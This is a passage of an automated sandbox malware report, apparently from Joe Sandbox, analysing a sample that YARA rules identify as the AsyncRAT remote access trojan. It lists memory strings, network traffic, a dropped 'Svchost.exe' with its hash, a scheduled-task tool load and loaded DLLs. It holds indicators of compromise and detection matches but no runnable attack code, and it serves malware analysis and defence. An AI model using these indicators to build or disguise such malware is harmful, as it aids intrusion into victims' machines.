                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013744014.00000152D0957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013554888.00000152D095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4522000138.00000152D0E80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000012.00000002.4521314909.00000152D00E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comVED
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2

                  System Summary

                  barindex
                  Source: X.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\X.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\X.exeCode function: 0_2_00007FFD348B65A60_2_00007FFD348B65A6
                  Source: C:\Users\user\Desktop\X.exeCode function: 0_2_00007FFD348B73520_2_00007FFD348B7352
                  Source: C:\Users\user\Desktop\X.exeCode function: 0_2_00007FFD348B0E890_2_00007FFD348B0E89
                  Source: C:\Users\user\Desktop\X.exeCode function: 0_2_00007FFD348B17F50_2_00007FFD348B17F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 4_2_00007FFD348907E04_2_00007FFD348907E0
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 4_2_00007FFD34890E894_2_00007FFD34890E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 4_2_00007FFD348917F54_2_00007FFD348917F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 5_2_00007FFD348A07E05_2_00007FFD348A07E0
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 5_2_00007FFD348A0E895_2_00007FFD348A0E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 5_2_00007FFD348A17F55_2_00007FFD348A17F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 6_2_00007FFD348807E06_2_00007FFD348807E0
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 6_2_00007FFD34880E896_2_00007FFD34880E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 6_2_00007FFD348817F56_2_00007FFD348817F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 10_2_00007FFD348C0E8910_2_00007FFD348C0E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 10_2_00007FFD348C17F510_2_00007FFD348C17F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 12_2_00007FFD348A0E8912_2_00007FFD348A0E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 12_2_00007FFD348A17F512_2_00007FFD348A17F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 13_2_00007FFD348A0E8913_2_00007FFD348A0E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 13_2_00007FFD348A17F513_2_00007FFD348A17F5
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 14_2_00007FFD34890E8914_2_00007FFD34890E89
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeCode function: 14_2_00007FFD348917F514_2_00007FFD348917F5
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Svchost.exe 3D07268C23490174416EF5A8061E318B5B8B820CB89B27803996085C3B3EE927
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\X.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
